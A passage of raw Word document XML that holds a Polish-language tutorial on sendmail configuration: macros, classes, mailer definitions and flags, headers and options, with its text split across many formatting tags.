        <w:t xml:space="preserve"> katalog domowy odbiorcy</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_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> oficjalny adres nadawc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 dodatkowo pare (waznych) makr "duzoliterow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S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Smart relay host - host, do ktorego forwardujesz swoja poczte, jesl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nie chesz jej dostarczac samodzielni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H</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> User, ktory otrzymuje cala lokalna poczt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M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Maskaradowanie nazwy hosta - w swiecie zewnetrznym nasz host bedzi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mial nazwe taka, jaka tu zdefiniujem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Klas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lasy sa uzywane w lhs (patrz definicja symboli dla lhs). Klasy definiuje sie w taki sposob:</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Ccfraza1 fraza2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dzie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> to nazwa klasy, a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>frazy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> to ciagi znakow (bez spacji), lub</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Fcpli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dzie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> to nazwa klasy, a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>plik</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> to nazwa pliku z frazam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dczytujac klase z pliku, mozna uzywac "funkcji" uzywanych w funkcji scanf.</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latego mozemy np. stworzyc klase wszystkich username'ow na podstawi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etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> w taki sposob:</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L/etc/passwd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sli tego nie rozumiesz, to '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>man scanf</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efinicja mail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ailery to takie programy, ktore fizycznie dostarczaja poczte. Zazwyczaj wywoluje sie je z okreslonymi parametrami. Aby z nich korzystac w sendmailu, trzeba je wpierw zdefiniowac. Sposob definicji mailera jest tak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nazwa_mailera, {pole=wartosc}*</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dzie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>nazwa_mailera</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> to nazwa mailera, pod jaka istnieje on dla sendmaila, a pary argumentow </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>pole=wartosc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> okreslaja rozne rzeczy, wazne z punktu widzenia mailera. Oto opis wszystkich dopuszczalnych po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Path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">       Sciezka do mail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Flags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">      Flagi, z ktorymi wywolujemy mailer (ich opis zamieszczam </w:t>
        <w:tab/>
        <w:t xml:space="preserve">     dalej)</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Sender</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">     Zbior adresow nadawcy</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Receipient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Zbior adresow odbiorcy</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Argv      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tablica argumentow dla mail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Eol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">        String okreslajacy EOL</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Maxsize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">    Maksymalna wielkosc list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Linelimit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">  Maksymalna dlugosc linijki list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Directory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">  Katalog roboczy mail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Uwaga na marginesie - nazwy pol mozna skracac do pierwszej litery ich nazwy, bo tylko ona jest istotna dla sendmaila. Czyli np. zamiast "Path" uzywamy "P" it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Opis flag mailer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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Uzywaj Extended SMTP</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b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Wymus pusta linie na koncu listu (rzadko uzywan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c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nie dolaczaj komentarzy do adresow (rzadko uzywan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D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ten mailer potrzebuje naglowka z linia "Dat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e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ten mailer jest za drogi, by sie z nim laczyc - laczyc sie z nim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bedziemy tylko podczas przebiegu kolejki</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E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Unikaj linii zaczynajacych sie od "From" w liscie ze znakiem '&gt;'</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f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mailer potrzebuje flagi from -f, ale tylko dla sieciowych operacj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forwardowania, np. wyrzucenie bledu, jesli uruchomil go user bez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uprawnien.</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F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mailer potrzebuje pola "From:" w naglowk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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ustawia adres nadawcy w listach generowanych (np. w listach z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informacja o bledzi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h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ochrona duzych liter w nazwach hostow dla tego mail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I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ten mailer bedzie gadal z sendmailem na drugim koncu - mozn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wykorzystac pare sendmail-specific udogodnien.</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l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ten mailer jest lokalny (np. dokonuje ostatecznego dostarczeni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poczty)</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L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ogranicza dlugosc linii zgodnie z rfc821. Flaga ta ustawia rowniez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flag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7. Dlugosc linii bedzie okreslana definicja </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>L=</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m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mailer moze wysylac poczte do wielu userow naraz</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M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ten mailer chce "Message-Id" w naglowk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n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nie dolaczaj linii "From" w unix-styl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p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>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P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mailer chce linii "Return-Path:"</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r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> To samo co f, tylko wysyla flage -r</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s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Wytnij z adresu znaki cytowania przed polaczeniem z mailerem</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S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nie resetuj User-Id przed polaczeniem z mailerem - to ma zapobie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falszywym adresom</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u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Duze litery username'u maja byc chronion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U</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mailer chce linii "From:" w unix-style z UUCP'owym "remote from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lt;host&gt;" na konc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x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ten mailer chce naglowka "Full-Nam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X</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Zalatwia problem z kropka, ktora domyslnie konczy list</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7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> obciecie listu do 7bi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Specjalne mailer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error</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Generuje bledy do uzytkownik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local</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Dostarczanie poczty lokaln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efiniowanie linii naglowkowych (headerow):</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aglowki definiujemy w nastepujacy sposob:</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H[?flagi?]nazwa_naglowka: wartosc_naglowk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dzie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>flagi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> sa opcjonalnymi - przynajmniej jedna z podanych flag musi byc w definicji mailera, by dolaczyc naglowe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Ustawianie opcj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endmail ma wiele opcji, ktore mozna sobie ustawiac. Oto sposob ustawiania opcj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Oowartos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Gdzie o to nazwa opcji, a wartosc to jej wartos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endmail obsluguje nastepujace opcj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n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Czekaj n minut na </w:t>
      </w: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xml:space="preserve"> w bazie aliasow. Jesli tego nie bedzie, t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przekompiluj baze (jesli ustawiona jest opcja D) lub wyrzuc blad.</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Aplik1, plik2,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Podanie alternatywnych plikow z aliasam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bN/M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Minimum N wolnego miejsca na dysku i maksymalne M wielkosci listow.</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Bc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Zamienia niecytowane spacje w adresie na znak c. (domyslnie spacj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c </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nie lacz sie natychmiast ze zbyt drogim mailerem.</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CN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sprawdza kolejke co N (domyslnie 10) wyslanych adresow.</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dx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Dostarcz w trybie x:</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x=i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> interaktywn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x=b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> w tl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x=q</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> kolejkuj listy</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D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">  Przekompiluj baze aliasow gdy zajdzie taka potrzeb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ex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Wyrzucaj bledy w trybie x:</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x=p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> wypisz na ekran</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x=q</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> daj tylko kod wyjsci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x=m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> wyslij informacje o bledzie poczt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x=w</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> wypisz blad z powrotem (poczta, jesli user jest niezalogowan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x=e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> j/w i daj kod wyjscia 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Eplik/komunika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Wysyla komunikat (jesli string nie zaczyna sie od '/', co oznacz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ciezke do pliku), lub plik z informacja o bledzi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f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">  Zachowaj unixowe linie "From"</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Ftryb</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Tryb plikowy kolejkowania plikow</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n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ustaw domyslna grupe w jakiej dziala mailer - domyslnie=1</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G</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">  Przeszukaj /etc/passwd gdy nie znasz alias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hN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Maksymalny hop count (liczba potraktowan sendmailem) - domyslnie=25</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Hpli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Plik z helpem do SMTP</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i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">  Ignoruj kropki w nadchodzacych listach - domyslnie wylaczon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I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">  Wymus korzystanie z bind'owanego nameserv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j</w:t>
      </w:r>
      <w:r>
        <w:rPr>
